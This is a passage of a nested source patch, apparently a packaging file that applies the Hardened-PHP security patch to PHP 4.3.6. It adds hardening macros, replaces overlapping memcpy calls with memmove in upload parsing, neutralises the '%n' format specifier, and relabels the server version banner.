+ #define PHP_ATTRIBUTE_MALLOC ZEND_ATTRIBUTE_MALLOC
+ #define PHP_ATTRIBUTE_FORMAT ZEND_ATTRIBUTE_FORMAT
+ 
+-#if !defined(HAVE_SNPRINTF) || !defined(HAVE_VSNPRINTF) || PHP_BROKEN_SPRINTF || PHP_BROKEN_SNPRINTF || PHP_BROKEN_VSNPRINTF
++#if !defined(HAVE_SNPRINTF) || !defined(HAVE_VSNPRINTF) || PHP_BROKEN_SPRINTF || PHP_BROKEN_SNPRINTF || PHP_BROKEN_VSNPRINTF || HARDENED_PHP
+ #include "snprintf.h"
+ #endif
+ #include "spprintf.h"
+@@ -431,6 +432,10 @@
+ #define XtOffsetOf(s_type, field) XtOffset(s_type*, field)
+ #endif
+ #endif /* !XtOffsetOf */
++
++#if HARDENED_PHP
++#include "hardened_php.h"
++#endif
+ 
+ #endif
+ 
+diff -Nur php-4.3.6.orig/main/php_config.h.in hardened-php/main/php_config.h.in
+--- php-4.3.6.orig/main/php_config.h.in Fri Apr 16 19:25:40 2004
++++ hardened-php/main/php_config.h.in   Sun May 16 00:33:40 2004
+@@ -831,6 +831,33 @@
+ /* Enabling BIND8 compatibility for Panther */
+ #undef BIND_8_COMPAT
+ 
++/* Hardened-PHP */
++#undef HARDENED_PHP
++
++/* Memory Manager Protection */
++#undef HARDENED_PHP_MM_PROTECT
++
++/* Memory Manager Protection */
++#undef HARDENED_PHP_MM_PROTECT
++
++/* Linked List Protection */
++#undef HARDENED_PHP_LL_PROTECT
++
++/* Linked List Protection */
++#undef HARDENED_PHP_LL_PROTECT
++
++/* Include/Require Protection */
++#undef HARDENED_PHP_INC_PROTECT
++
++/* Include/Require Protection */
++#undef HARDENED_PHP_INC_PROTECT
++
++/* Fmt String Protection */
++#undef HARDENED_PHP_FMT_PROTECT
++
++/* Fmt String Protection */
++#undef HARDENED_PHP_FMT_PROTECT
++
+ /* Whether you have AOLserver */
+ #undef HAVE_AOLSERVER
+ 
+diff -Nur php-4.3.6.orig/main/rfc1867.c hardened-php/main/rfc1867.c
+--- php-4.3.6.orig/main/rfc1867.c       Fri Apr 16 19:25:39 2004
++++ hardened-php/main/rfc1867.c Sun May 16 00:42:55 2004
+@@ -147,7 +147,7 @@
+        
+        /* and remove it */
+        if (s != varname) {
+-               memcpy(varname, s, strlen(s)+1);
++               memmove(varname, s, strlen(s)+1);
+        }
+ 
+        for (p=varname; *p && *p != '['; p++) {
+@@ -178,7 +178,7 @@
+                indexend = indexend ? indexend + 1 : index + strlen(index);
+                
+                if (s != index) {
+-                       memcpy(s, index, strlen(s)+1);
++                       memmove(s, index, strlen(index)+1);
+                        s += indexend-index;
+                } else {
+                        s = indexend;
+diff -Nur php-4.3.6.orig/main/snprintf.c hardened-php/main/snprintf.c
+--- php-4.3.6.orig/main/snprintf.c      Fri Apr 16 19:25:40 2004
++++ hardened-php/main/snprintf.c        Sun May 16 00:33:40 2004
+@@ -462,7 +462,7 @@
+        return (buf);
+ }
+ 
+-#if !defined(HAVE_SNPRINTF) || !defined(HAVE_VSNPRINTF) || PHP_BROKEN_SNPRINTF || PHP_BROKEN_VSNPRINTF
++#if !defined(HAVE_SNPRINTF) || !defined(HAVE_VSNPRINTF) || PHP_BROKEN_SNPRINTF || PHP_BROKEN_VSNPRINTF || HARDENED_PHP
+ 
+ /*
+  * NUM_BUF_SIZE is the size of the buffer used for arithmetic conversions
+@@ -852,7 +852,11 @@
+ 
+ 
+                                case 'n':
++#if HARDENED_PHP_FMT_PROTECT
++                                       php_security_log("'n' specifier within format string");
++#else
+                                        *(va_arg(ap, int *)) = cc;
++#endif
+                                        break;
+ 
+                                        /*
+diff -Nur php-4.3.6.orig/main/snprintf.h hardened-php/main/snprintf.h
+--- php-4.3.6.orig/main/snprintf.h      Fri Apr 16 19:25:40 2004
++++ hardened-php/main/snprintf.h        Sun May 16 00:33:40 2004
+@@ -62,12 +62,12 @@
+ #ifndef SNPRINTF_H
+ #define SNPRINTF_H
+ 
+-#if !defined(HAVE_SNPRINTF) || PHP_BROKEN_SNPRINTF
++#if !defined(HAVE_SNPRINTF) || PHP_BROKEN_SNPRINTF || HARDENED_PHP
+ int ap_php_snprintf(char *, size_t, const char *, ...) PHP_ATTRIBUTE_FORMAT(printf, 3, 4);
+ #define snprintf ap_php_snprintf
+ #endif
+ 
+-#if !defined(HAVE_VSNPRINTF) || PHP_BROKEN_VSNPRINTF
++#if !defined(HAVE_VSNPRINTF) || PHP_BROKEN_VSNPRINTF || HARDENED_PHP
+ int ap_php_vsnprintf(char *, size_t, const char *, va_list ap) PHP_ATTRIBUTE_FORMAT(printf, 3, 0);
+ #define vsnprintf ap_php_vsnprintf
+ #endif
+diff -Nur php-4.3.6.orig/main/spprintf.c hardened-php/main/spprintf.c
+--- php-4.3.6.orig/main/spprintf.c      Fri Apr 16 19:25:39 2004
++++ hardened-php/main/spprintf.c        Sun May 16 00:33:40 2004
+@@ -531,7 +531,11 @@
+ 
+ 
+                                case 'n':
++#if HARDENED_PHP_FMT_PROTECT
++                                       php_security_log("'n' specifier within format string");
++#else
+                                        *(va_arg(ap, int *)) = cc;
++#endif
+                                        break;
+ 
+                                        /*
+diff -Nur php-4.3.6.orig/sapi/apache/mod_php4.c hardened-php/sapi/apache/mod_php4.c
+--- php-4.3.6.orig/sapi/apache/mod_php4.c       Fri Apr 16 19:25:44 2004
++++ hardened-php/sapi/apache/mod_php4.c Sun May 16 00:33:40 2004
+@@ -891,7 +891,11 @@
+        {
+                TSRMLS_FETCH();
+                if (PG(expose_php)) {
++#if HARDENED_PHP
++                       ap_add_version_component("Hardened-PHP/" PHP_VERSION);
++#else
+                        ap_add_version_component("PHP/" PHP_VERSION);
++#endif                 
+                }
+        }
+ #endif
+diff -Nur php-4.3.6.orig/sapi/apache2filter/sapi_apache2.c hardened-php/sapi/apache2filter/sapi_apache2.c
+--- php-4.3.6.orig/sapi/apache2filter/sapi_apache2.c    Fri Apr 16 19:25:45 2004
++++ hardened-php/sapi/apache2filter/sapi_apache2.c      Sun May 16 00:33:40 2004
+@@ -559,7 +559,11 @@
+ {
+        TSRMLS_FETCH();
+        if (PG(expose_php)) {
++#if HARDENED_PHP
++               ap_add_version_component(p, "Hardened-PHP/" PHP_VERSION);
++#else
+                ap_add_version_component(p, "PHP/" PHP_VERSION);
++#endif
+        }
+ }
+ 
+diff -Nur php-4.3.6.orig/sapi/apache2handler/sapi_apache2.c hardened-php/sapi/apache2handler/sapi_apache2.c
+--- php-4.3.6.orig/sapi/apache2handler/sapi_apache2.c   Fri Apr 16 19:25:45 2004
++++ hardened-php/sapi/apache2handler/sapi_apache2.c     Sun May 16 00:33:40 2004
+@@ -358,7 +358,11 @@
+ {
+        TSRMLS_FETCH();
+        if (PG(expose_php)) {
++#if HARDENED_PHP
++               ap_add_version_component(p, "Hardened-PHP/" PHP_VERSION);
++#else
+                ap_add_version_component(p, "PHP/" PHP_VERSION);
++#endif
+        }
+ }
+